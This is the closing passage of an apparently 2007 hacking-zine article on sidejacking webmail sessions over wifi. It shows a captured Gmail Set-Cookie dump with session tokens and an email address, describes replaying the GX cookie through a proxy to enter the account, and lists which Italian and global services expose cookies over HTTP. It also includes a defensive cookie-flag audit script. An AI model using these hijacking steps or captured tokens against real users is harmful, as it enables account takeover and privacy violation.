    * http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=4&SID=96A8691006BBAC24&RID=28326&zx=zab2pw-d61rfe&t=1
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=sent
    * http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=317&SID=96A8691006BBAC24&RID=28327&zx=jfh2v0-zhb58w&t=1

Set-Cookies (18):

Set-Cookie: GMAIL_AT=xn3j2xo9rptl0x2dpylih9ot3o84x5; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
Set-Cookie: GMAIL_IMP=EXPIRED; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/;
Set-Cookie: GMAIL_LOGIN=T1196434986128/1196434986128/1196434991464; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
Set-Cookie: GMAIL_RTT=203; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
Set-Cookie: GMAIL_STAT=EXPIRED; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/;
Set-Cookie: GMAIL_STAT_PENDING=/S:a=lc&sv=tl&ev=tl&s=13&t=1394&w=521&; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
Set-Cookie: GX=DQAAAG4AAADY6wZGiHdqH9flBuHSLJKHnUhZ6yeWAfnu-DibzNPedKvzrX65AGLN4gX7GUzWVDHUvRtia8U1d1iUTQDhEHJAuWw0H6zMM9cUu7GCJwo0xO9ti4h5ibJn3BY4cbpz9JaMORDyTMYPjNKExV3dZLo5; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
Set-Cookie: N_T=sess=5c47c2c1a80020e8&v=2&c=16388f3b&s=47502708&t=s:0:switchguide.html&sessref=; expires=Fri, 30-Nov-07 15:36:48 GMT; path=/support;
Set-Cookie: PREF=ID=38f52b118d41bca7:TM=1196435005:LM=1196435005:GM=1:S=MvwiRzegb4sU8QoM; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
Set-Cookie: S=gmail=qceQSU5gZHnCMXxJU7dpGQ:gmail_yj=iZRj9Zr6FCLmONTwzQVOfQ:gmproxy=kw6RnIqPqPk:gmproxy_yj=xV-JZ7AkzZI:gmproxy_yj_sub=qNUhkKVM8SQ; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
Set-Cookie: SID=DQAAAG4AAADHd05wGtOwIVsWGKHSt2zo_caJx3tnkV79W_hFfOPyAGZWGeztvy52-jR9BdSKchm2XlsNDUVEfAY3Dhod3auXUlilIvnTy_rDIPTbg5ZMHS08IWPEcGHwd6VfiBV7IYwr0j3r2uJoA30wbOzulUKP; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
Set-Cookie: TZ=-60; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
Set-Cookie: __utma=173272373.1028249202.1196434987.1196434987.1196434987.1; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
Set-Cookie: __utmb=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
Set-Cookie: __utmc=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
Set-Cookie: __utmx=173272373.00000785162142287121:1:0-0-1-0-0-0; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
Set-Cookie: __utmz=173272373.1196434987.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
Set-Cookie: gmailchat=charlieroot69@gmail.com/769423; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;

EOF

The only cookie host is google.com, so we follow that link. At this point we get the same page back, but now with the Gmail cookies loaded into the browser. We follow the 'http://mail.google.com/mail/' link from the Links and restore the original proxy configuration... we're in!! Experimenting a bit, I noticed that the only cookie relevant for authentication is GX; all the others can be ignored (quickly, via bin/cookieserver/subset.sh).

Conclusions

I also checked a few other web services; the results are as follows:

http://190.it/
Auth is over HTTPS but then falls back to HTTP.
http://poste.it/
Auth is over HTTPS and stays on HTTPS. Just one detail: the Secure flag is missing on the cookies set over HTTPS. Its presence would make the service safer if the user fails to log out (and then returns to the Poste site over HTTP, sending the cookie in the clear).
http://www.libero.it/
Auth is over HTTP and stays on HTTP. Here the username and password themselves go over in the clear... zero security!!
http://it.yahoo.com/
Auth is over HTTPS but then falls back to HTTP.
http://www.hotmail.com/
Auth is over HTTPS but then falls back to HTTP.
http://mail.google.com/
Auth is over HTTPS but then falls back to HTTP.
http://docs.google.com/
Auth is over HTTPS but then falls back to HTTP.
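The Secure-flag point from the poste.it entry, as an added example that is not part of Cookie Tools: a small Python audit that parses Set-Cookie lines in the format cookieserver prints them and reports cookies a browser would also send over plain HTTP. The sample lines are constructed, and the HttpOnly check goes one step beyond what the article covers.

```python
# Added audit helper, not part of Cookie Tools: parses Set-Cookie lines in the
# format cookieserver prints and flags cookies set over HTTPS without Secure
# (the poste.it finding above); the HttpOnly check goes beyond the article.
from dataclasses import dataclass, field

@dataclass
class Cookie:
    name: str
    value: str
    attrs: dict = field(default_factory=dict)  # e.g. {"domain": "google.com"}
    flags: set = field(default_factory=set)    # e.g. {"secure", "httponly"}

def parse_set_cookie(line: str) -> Cookie:
    """Parse one 'Set-Cookie: NAME=VALUE; attr=val; Flag;' line."""
    body = line.strip()
    if body.lower().startswith("set-cookie:"):
        body = body.split(":", 1)[1]
    parts = [p.strip() for p in body.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    cookie = Cookie(name.strip(), value.strip())
    for part in parts[1:]:
        if "=" in part:                 # attribute with a value
            key, _, val = part.partition("=")
            cookie.attrs[key.strip().lower()] = val.strip()
        else:                           # bare flag such as Secure
            cookie.flags.add(part.lower())
    return cookie

def audit(lines, set_over_https=True):
    """Return [(name, [issues])] for cookies unsafe to carry into plain HTTP."""
    findings = []
    for line in lines:
        cookie = parse_set_cookie(line)
        issues = []
        # Without Secure the browser also sends the cookie over plain HTTP, so an
        # HTTPS-only login still leaks the session on the next HTTP visit.
        if set_over_https and "secure" not in cookie.flags:
            issues.append("missing Secure")
        if "httponly" not in cookie.flags:  # script-readable session cookie
            issues.append("missing HttpOnly")
        if issues:
            findings.append((cookie.name, issues))
    return findings

# Constructed sample lines in the article's output format; values are not real.
SAMPLE_LINES = [
    "Set-Cookie: GX=EXAMPLE_SESSION_TOKEN; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;",
    "Set-Cookie: TZ=-60; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;",
    "Set-Cookie: sess=abc123; path=/; domain=example.com; Secure; HttpOnly",
]
```

Feeding it the Set-Cookie block from the cookieserver page above reports every Gmail cookie, GX included, as lacking Secure.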
All of them are more or less vulnerable. The situation is cheerful and carefree! Here it's the users who need to wake up and protest: HTTPS must be used by default as the transport protocol, everywhere and always, for this kind of service. I will keep an updated version of the list at http://xenion.antifork.org/cookietools/lista/index.html; if you want to contribute new reports and updates, write to me :) And now we've reached the end... thanks to everyone who passively supported me in testing on the wifi0 interface... :P It was a pleasure to be back on BFi, greetings to all and until next time! .x


xenion - Sun Dec 9 22:47:18 CET 2007